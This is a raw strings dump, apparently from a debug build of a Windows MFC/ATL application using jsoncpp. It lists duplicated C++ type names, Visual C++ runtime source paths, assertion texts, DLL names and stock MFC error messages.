.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
5 6$6(6,60646
5 6$6(6,60646
3"3-3P3r3}3
3"3-3P3r3}3
6"7-7H7r7}7
6"7-7H7r7}7
2 2$2(2,20242
2 2$2(2,20242
4080
4080
3!4/4_4{4
3!4/4_4{4
8-848n8}8
8-848n8}8
> ?/?4?>?
> ?/?4?>?
7Â8
7Â8
0(1,10141
0(1,10141
6%6U6
6%6U6
1%1x1
1%1x1
4 4,424|4
4 4,424|4
:":3:=:]:
:":3:=:]:
8 8$8(8,8\8
8 8$8(8,8\8
>"?@?^?|?
>"?@?^?|?
%0U0h0
%0U0h0
:&; ;0;8;
:&; ;0;8;
3%4,4(505(8
3%4,4(505(8
9 :0:5:::};
9 :0:5:::};
;&
;&
9"9*929>9
9"9*929>9
:2
:2
53585=5|5
53585=5|5
0%1U1
0%1U1
77K7U7v7{7
77K7U7v7{7
2/2K2U2v2{2
2/2K2U2v2{2
4O4P4f4k4u4
4O4P4f4k4u4
3?3K3U3v3{3
3?3K3U3v3{3
3 3$3(3,30343
3 3$3(3,30343
$0(0,0004080
$0(0,0004080
6 6$6(6,606
6 6$6(6,606
6$7(7,7074787
6$7(7,7074787
4$5(5,5054585
4$5(5,5054585
9 9$9(9,9094989
9 9$9(9,9094989
: :$:(:,:0:4:
: :$:(:,:0:4:
? ?$?(?,?0?4?8?@?
? ?$?(?,?0?4?8?@?
1(2,2024282
1(2,2024282
0 0$0(0,000
0 0$0(0,000
6 6$6(6,6
6 6$6(6,6
> >$>(>,>0>4>
> >$>(>,>0>4>
= =,=8=
= =,=8=
? ?(?0?8?@?
? ?(?0?8?@?
>$>,>8>\>|>
>$>,>8>\>|>
4 4
4 4
;(;,;4;8;\;
;(;,;4;8;\;
6 6$6(6,6064686
6 6$6(6,6064686
E:\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
E:\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
E:\Microsoft Visual Studio 10.0\VC\include\xutility
E:\Microsoft Visual Studio 10.0\VC\include\xutility
std::_String_const_iterator,class std::allocator >::operator *
std::_String_const_iterator,class std::allocator >::operator *
E:\Microsoft Visual Studio 10.0\VC\include\xstring
E:\Microsoft Visual Studio 10.0\VC\include\xstring
E:\Microsoft Visual Studio 10.0\VC\include\deque
E:\Microsoft Visual Studio 10.0\VC\include\deque
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_value.cpp
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_value.cpp
c:\program files\microsoft visual studio 10.0\vc\include\xstring
c:\program files\microsoft visual studio 10.0\vc\include\xstring
c:\program files\microsoft visual studio 10.0\vc\include\xtree
c:\program files\microsoft visual studio 10.0\vc\include\xtree
std::_Tree_const_iterator,class std::allocator >,0> > >::operator *
std::_Tree_const_iterator,class std::allocator >,0> > >::operator *
std::_Tree_const_iterator,class std::allocator >,0> > >::operator
std::_Tree_const_iterator,class std::allocator >,0> > >::operator
std::_Tree_const_iterator,class std::allocator >,0> > >::operator --
std::_Tree_const_iterator,class std::allocator >,0> > >::operator --
std::_Tree_const_iterator,class std::allocator >,0> > >::operator ==
std::_Tree_const_iterator,class std::allocator >,0> > >::operator ==
invalid operator
invalid operator
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_reader.cpp
d:\sunita\download\jsoncpp-src-0.5.0\jsoncpp-src-0.5.0\src\lib_json\json_reader.cpp
std::_Deque_const_iterator >::operator *
std::_Deque_const_iterator >::operator *
c:\program files\microsoft visual studio 10.0\vc\include\deque
c:\program files\microsoft visual studio 10.0\vc\include\deque
std::_Deque_const_iterator >::operator
std::_Deque_const_iterator >::operator
std::_Deque_const_iterator >::operator *
std::_Deque_const_iterator >::operator *
std::_Deque_const_iterator >::operator --
std::_Deque_const_iterator >::operator --
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltransactionmanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltransactionmanager.h
hhctrl.ocx
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h
accKeyboardShortcut
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h
hKeyParent != 0
hKeyParent != 0
SHELL32.DLL
SHELL32.DLL
Am_hKey != 0
Am_hKey != 0
dwmapi.dll
dwmapi.dll
UxTheme.dll
UxTheme.dll
m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)
m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h
USER32.DLL
USER32.DLL
CIsIndexed()
CIsIndexed()
mscoree.dll
mscoree.dll
^RICHED20.DLL
^RICHED20.DLL
mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE
mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
wcscpy_s(szExeName, 260, L"")
wcscpy_s(szExeName, 260, L"")
__crtMessageWindowW
__crtMessageWindowW
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
_CrtCheckMemory()
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtIsValidHeapPointer(pUserData)
_CrtSetDbgFlag
_CrtSetDbgFlag
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
_CrtMemCheckpoint
_CrtMemCheckpoint
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
f:\dd\vctools\crt_bld\self_x86\crt\src\assert.c
f:\dd\vctools\crt_bld\self_x86\crt\src\assert.c
f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c
ekernel32.dll
ekernel32.dll
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\strdup.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strdup.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
i_CrtSetReportHook2
i_CrtSetReportHook2
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szExeName, 260, "")
strcpy_s(szExeName, 260, "")
__crtMessageWindowA
__crtMessageWindowA
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsdec.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsdec.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsupr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsupr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0
fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0
_CrtSetReportMode
_CrtSetReportMode
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
nRptType >= 0 && nRptType
nRptType >= 0 && nRptType
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportA
_VCrtDbgReportA
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportW
_VCrtDbgReportW
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
iwcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
iwcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
_NMSG_WRITE
_NMSG_WRITE
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\fwprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy_s.inl
ADVAPI32.DLL
ADVAPI32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricoll.c
strcpy_s(resultstr, resultsize, autofos.man)
strcpy_s(resultstr, resultsize, autofos.man)
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strcoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strcoll.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
MSPDB100.DLL
MSPDB100.DLL
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
("CRT Logic error during setenv",0)
("CRT Logic error during setenv",0)
__crtsetenv
__crtsetenv
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
ppCategory && pfnCrtDbgReport
ppCategory && pfnCrtDbgReport
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
Assertion failed: %s, file %s, line %d
Assertion failed: %s, file %s, line %d
All Files (*.*)
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
